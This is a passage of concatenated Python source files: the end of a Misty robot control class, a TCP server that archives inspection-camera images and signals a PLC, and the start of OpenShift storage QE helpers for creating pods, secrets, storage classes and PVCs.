requests.post('http://'+self.ip+'/api/images/display',json={'FileName': image_name ,'TimeOutSeconds': 5,'Alpha': 1})
else:
print(image_name,"not found on the robot, use <robot_name>.printImageList() to see the list of saved images")
def playAudio(self,file_name):
if file_name in self.audio_saved:
requests.post('http://'+self.ip+'/api/audio/play',json={"AssetId": file_name})
else:
print(file_name,"not found on the robot, use <robot_name>.printAudioList() to see the list of saved audio files")
def battery(self):
resp = requests.get('http://'+self.ip+'/api/battery')
for reply in resp.json():
return (reply)
def moveHead(self,roll,pitch,yaw,velocity=5):
assert roll in range(-5,6) and pitch in range(-5,6) and yaw in range(-5,6), " moveHead: Roll, Pitch and Yaw needs to be in range -5 to +5"
assert velocity in range(0,11), " moveHead: Velocity needs to be in range 0 to 10"
requests.post('http://'+self.ip+'/api/head',json={"Pitch": pitch, "Roll": roll, "Yaw": yaw, "Velocity": velocity})
def drive(self,linear_velocity, angular_velocity):
assert linear_velocity in range(-100,101) and angular_velocity in range(-100,101), " drive: The velocities needs to be in the range -100 to 100"
requests.post('http://'+self.ip+'/api/drive',json={"LinearVelocity": linear_velocity,"AngularVelocity": angular_velocity})
def driveTime(self,linear_velocity, angular_velocity,time_in_milli_second):
assert linear_velocity in range(-100,101) and angular_velocity in range(-100,101), " driveTime: The velocities needs to be in the range -100 to 100"
assert isinstance(time_in_milli_second, int) or isinstance(time_in_milli_second, float), " driveTime: Time should be an integer or float and the unit is milli seconds"
requests.post('http://'+self.ip+'/api/drive/time',json={"LinearVelocity": linear_velocity,"AngularVelocity": angular_velocity, "TimeMS": time_in_milli_second})
def driveTrack(self,left_track_speed,right_track_speed):
assert left_track_speed in range(-100,101) and right_track_speed in range(-100,101), " driveTrack: The velocities needs to be in the range -100 to 100"
requests.post('http://'+self.ip+'/api/drive/track',json={"LeftTrackSpeed": left_track_speed,"RightTrackSpeed": right_track_speed})
def stop(self):
requests.post('http://'+self.ip+'/api/drive/stop')
def sendBackpack(self,message):
assert isinstance(message, str), " sendBackpack: Message sent to the Backpack should be a string"
requests.post('http://'+self.ip+'/api/serial',json={"Message": message})
def populateImages(self):
self.images_saved = []
resp = requests.get('http://'+self.ip+'/api/images/list')
for reply in resp.json():
# # print(reply)
# for out in reply:
# print("out: " ,out)
self.images_saved.append(reply)
def populateAudio(self):
self.audio_saved = []
resp = requests.get('http://'+self.ip+'/api/audio/list')
for reply in resp.json():
# for out in reply["result"]:
self.audio_saved.append(reply)
def populateLearnedFaces(self):
self.faces_saved = []
resp = requests.get('http://'+self.ip+'/api/faces')
for reply in resp.json():
self.faces_saved = reply
def printImageList(self):
print(self.images_saved)
def getImageList(self):
return self.images_saved
def printAudioList(self):
print(self.audio_saved)
def getAudioList(self):
return self.audio_saved
def printSubscriptionList(self):
print(self.available_subscriptions)
def startFaceRecognition(self):
requests.post('http://'+self.ip+'/api/faces/recognition/start')
def stopFaceRecognition(self):
requests.post('http://'+self.ip+'/api/faces/recognition/stop')
def printLearnedFaces(self):
print(self.faces_saved)
def getLearnedFaces(self):
return self.faces_saved
def clearLearnedFaces(self):
requests.delete('http://'+self.ip+'/api/faces')
self.faces_saved = []
def learnFace(self,name):
assert isinstance(name, str), " trainFace: name must be a string"
requests.post('http://'+self.ip+'/api/faces/training/start',json={"FaceId": name})
print("Please look at Misty's face for 15 seconds..")
for i in range(15):
print(15-i)
time.sleep(1)
print("Face Captured!!")
print("Please allow 15 second processing time !")
for i in range(15):
print(15-i)
time.sleep(1)
print("Face Trained")
self.populateLearnedFaces()
##### WEB SOCKETS #####
def backpack(self):
if self.backpack_instance is not None:
data = self.backpack_instance.data
try:
return json.loads(data)["message"]["message"]
except:
return json.loads(data)
else:
return " Backpack data is not subscribed, use the command robot_name.subscribe(\"SerialMessage\")"
def time_of_flight(self):
if self.time_of_flight_instance[0] is not None or self.time_of_flight_instance[1] is not None or self.time_of_flight_instance[2] is not None or self.time_of_flight_instance[3] is not None:
out = "{"
for i in range(4):
try:
data_out = json.loads(self.time_of_flight_instance[i].data)
#print(data_out)
out+="\""+data_out["message"]["sensorPosition"]+"\""+":"
out+=str(data_out["message"]["distanceInMeters"])+","
except:
return json.loads(self.time_of_flight_instance[i].data)
out = out[:-1]
out+="}"
return json.loads(out)
else:
return " TimeOfFlight not subscribed, use the command robot_name.subscribe(\"TimeOfFlight\")"
def faceRec(self):
data = json.loads(self.face_recognition_instance.data)
try:
out = "{ \"personName\" : \"" + data["message"]["personName"] + "\", \"distance\" : \"" + str(data["message"]["distance"]) + "\", \"elevation\" :\"" + str(data["message"]["elevation"]) + "\"}"
return(json.loads(out))
except:
return json.loads(self.face_recognition_instance.data)
def subscribe(self,Type,value=None,debounce =0):
assert isinstance(Type, str), " subscribe: type name need to be string"
if Type in self.available_subscriptions:
if Type == "SerialMessage":
if self.backpack_instance is None:
self.backpack_instance = Socket(self.ip,Type,_value=value, _debounce = debounce)
time.sleep(1)
elif Type == "TimeOfFlight":
if self.time_of_flight_instance[0] is None:
self.time_of_flight_instance[0] = Socket(self.ip,Type,_value="Left", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[1] = Socket(self.ip,Type,_value="Center", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[2] = Socket(self.ip,Type,_value="Right", _debounce = debounce)
time.sleep(0.05)
self.time_of_flight_instance[3] = Socket(self.ip,Type,_value="Back", _debounce = debounce)
time.sleep(1)
elif Type == "FaceRecognition":
if self.face_recognition_instance is None:
self.startFaceRecognition()
print("FaceRecStarted")
self.face_recognition_instance = Socket(self.ip,Type,_value="ComputerVision", _debounce = debounce)
else:
print(" subscribe: Type name - ",Type,"is not recognized by the robot, use <robot_name>.printSubscriptionList() to see the list of possible Type names")
def unsubscribe(self,Type):
assert isinstance(Type, str), " unsubscribe: type name need to be string"
if Type in self.available_subscriptions:
if Type == "SerialMessage":
if self.backpack_instance is not None:
self.backpack_instance.unsubscribe()
self.backpack_instance = None
else:
print("Unsubscribe:",Type, "is not subscribed")
elif Type == "TimeOfFlight":
if self.time_of_flight_instance[0] is not None:
for i in range(4):
self.time_of_flight_instance[i].unsubscribe()
time.sleep(0.05)
self.time_of_flight_instance = [None]*4
else:
print("Unsubscribe:",Type,"is not subscribed")
if Type == "FaceRecognition":
if self.face_recognition_instance is not None:
self.face_recognition_instance.unsubscribe()
self.face_recognition_instance = None
self.stopFaceRecognition()
else:
print("Unsubscribe:",Type, "is not subscribed")
else:
print(" unsubscribe: Type name - ",Type,"is not recognised by the robot, use <robot_name>.printSubscriptionList() to see the list of possible Type names")
# Every web socket is considered an instance
class Socket:
def __init__(self, ip,Type, _value = None, _debounce = 0):
self.ip = ip
self.Type = Type
self.value = _value
self.debounce = _debounce
self.data = "{\"status\":\"Not_Subscribed or just waiting for data\"}"
self.event_name = None
self.ws = None
self.initial_flag = True
dexter = threading.Thread(target=self.initiate)
dexter.start()
def initiate(self):
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("ws://"+self.ip+"/pubsub",on_message = self.on_message,on_error = self.on_error,on_close = self.on_close)
self.ws.on_open = self.on_open
self.ws.run_forever(ping_timeout=10)
def on_message(self,ws,message):
if self.initial_flag:
self.initial_flag = False
else:
self.data = message
def on_error(self,ws, error):
print(error)
def on_close(self,ws):
ws.send(str(self.get_unsubscribe_message(self.Type)))
self.data = "{\"status\":\"Not_Subscribed or just waiting for data\"}"
print("###",self.Type," socket is closed ###")
def on_open(self,ws):
def run(*args):
self.ws.send(str(self.get_subscribe_message(self.Type)))
thread.start_new_thread(run, ())
def unsubscribe(self):
self.on_close(self.ws)
def get_subscribe_message(self,Type):
self.event_name = str(randint(0,10000000000))
if Type == "SerialMessage":
subscribeMsg = {
"Operation": "subscribe",
"Type": "SerialMessage",
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": "SerialMessage"}
elif Type == "TimeOfFlight":
subscribeMsg = {
"$id" : "1",
"Operation": "subscribe",
"Type": "TimeOfFlight",
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": "",
"EventConditions":
[{
"Property": "SensorPosition",
"Inequality": "=",
"Value": self.value
}]}
elif Type == "FaceRecognition":
subscribeMsg = {
"Operation": "subscribe",
"Type": self.value,
"DebounceMs": self.debounce,
"EventName": self.event_name,
"Message": "",
"ReturnProperty": ""}
return subscribeMsg
def get_unsubscribe_message(self,Type):
if Type == "SerialMessage":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
elif Type == "TimeOfFlight":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
elif Type == "FaceRecognition":
unsubscribeMsg = {
"Operation": "unsubscribe",
"EventName": self.event_name,
"Message": ""}
return unsubscribeMsg
|
RecvImgandSendSig.py
|
#!/usr/bin/env python3
# *_* coding: UTF-8 *_*
# @File : test.py
# @Author: Frank1126lin
# @Date : 2020/11/1
import os
import time
import shutil
import socket
import threading
def s1():
ss1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket对象
host = socket.gethostbyname(socket.gethostname())# 获取本地主机名称
# host = "192.168.2.200"
port = 2200 # 定义端口号
ss1.bind((host, port)) # 绑定端口号
ss1.listen(5)
print(f"@已开始监听@:{host}:{port}")
global src_path
src_path = "Z:\\"
global tar_path
tar_path = os.path.join(os.getcwd(),"china_photo", time.strftime("%Y-%m-%d", time.localtime(time.time())))
if not os.path.exists(tar_path):
os.makedirs(tar_path)
while True:
conn, addr = ss1.accept() # 建立客户端连接
print(f"@{addr[0]}:{addr[1]}@来了")
while True:
m = conn.recv(1024)
if not m:
continue
m = m.decode("utf-8")
print(f"@{addr[0]}说:{m}")
photo_name = time.strftime('%Y-%m-%d-%H-%M-%S',time.localtime(time.time())) + ".bmp"
# print(photo_name)
if m == "CCD10":
src_photo = os.path.join(src_path, "CCD10.bmp")
tar_photo = os.path.join(tar_path, f"平整度-{photo_name}")
if not os.path.exists(src_photo):
print("平整度图片不存在!请检查后重试!")
continue
shutil.copy(src_photo, tar_photo)
print("图片已保存至", tar_photo)
if m == "CCD11":
src_photo = os.path.join(src_path, "CCD11.bmp")
tar_photo = os.path.join(tar_path, f"上外观-{photo_name}")
if not os.path.exists(src_photo):
print("上外观图片不存在!请检查后重试!")
continue
shutil.copy(src_photo, tar_photo)
print("图片已保存至", tar_photo)
event.set()
if m == "CCD20":
src_photo = os.path.join(src_path, "CCD20.bmp")
tar_photo = os.path.join(tar_path, f"下外观-{photo_name}")
if not os.path.exists(src_photo):
print("下外观图片不存在!请检查后重试!")
continue
shutil.copy(src_photo, tar_photo)
print("图片已保存至", tar_photo)
def s2():
ss2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 创建socket对象
host = socket.gethostbyname(socket.gethostname())# 获取本地主机名称
# host = "192.168.2.200"
port = 2100 # 定义端口号
ss2.bind((host, port)) # 绑定端口号
ss2.listen(5)
print(f"@已开始监听@:{host}:{port}")
conn, addr = ss2.accept() # 建立客户端连接
print(f"@{addr[0]}:{addr[1]}@来了")
while True:
event.clear()
m = conn.recv(1024)
if not m:
return
print(f"@{addr[0]}说:{m}")
msg = b"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
event.wait()
conn.send(msg)
print(f"@{host}我说:{msg}")
if __name__ == '__main__':
event = threading.Event()
server_th = threading.Thread(target=s1)
plc_th = threading.Thread(target=s2)
server_th.start()
plc_th.start()
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix trimmed due to
kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["compressionMode"] = compression
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(constants.CSI_RBD_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(constants.CSI_CEPHFS_STORAGECLASS_YAML)
sc_data["parameters"]["csi.storage.k8s.io/node-stage-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/node-stage-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["csi.storage.k8s.io/provisioner-secret-name"] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/provisioner-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-name"
] = secret_name
sc_data["parameters"][
"csi.storage.k8s.io/controller-expand-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
do_reload=False,
access_mode=constants.ACCESS_MODE_RWO,
burst=False,
):
"""
Create one or more PVC as a bulk or one by one
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
burst (bool): True for bulk creation, False ( default) for multiple creation
Returns:
ocs_objs (list): List of PVC objects
tmpdir (str): The full path of the directory in which the yamls for pvc objects creation reside
"""
if not burst:
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
volume_mode = "Block"
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name,
size=size,
namespace=namespace,
do_reload=do_reload,
access_mode=access_mode,
volume_mode=volume_mode,
)
for _ in range(number_of_pvc)
]
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if access_mode == "ReadWriteMany" and "rbd" in sc_name:
pvc_data["spec"]["volumeMode"] = "Block"
else:
pvc_data["spec"]["volumeMode"] = None
# Creating tem directory to hold the files for the PVC creation
tmpdir = tempfile.mkdtemp()
logger.info("Creating the PVC yaml files for creation in bulk")
ocs_objs = []
for _ in range(number_of_pvc):
name = create_unique_resource_name("test", "pvc")
logger.info(f"Adding PVC with name {name}")
pvc_data["metadata"]["name"] = name
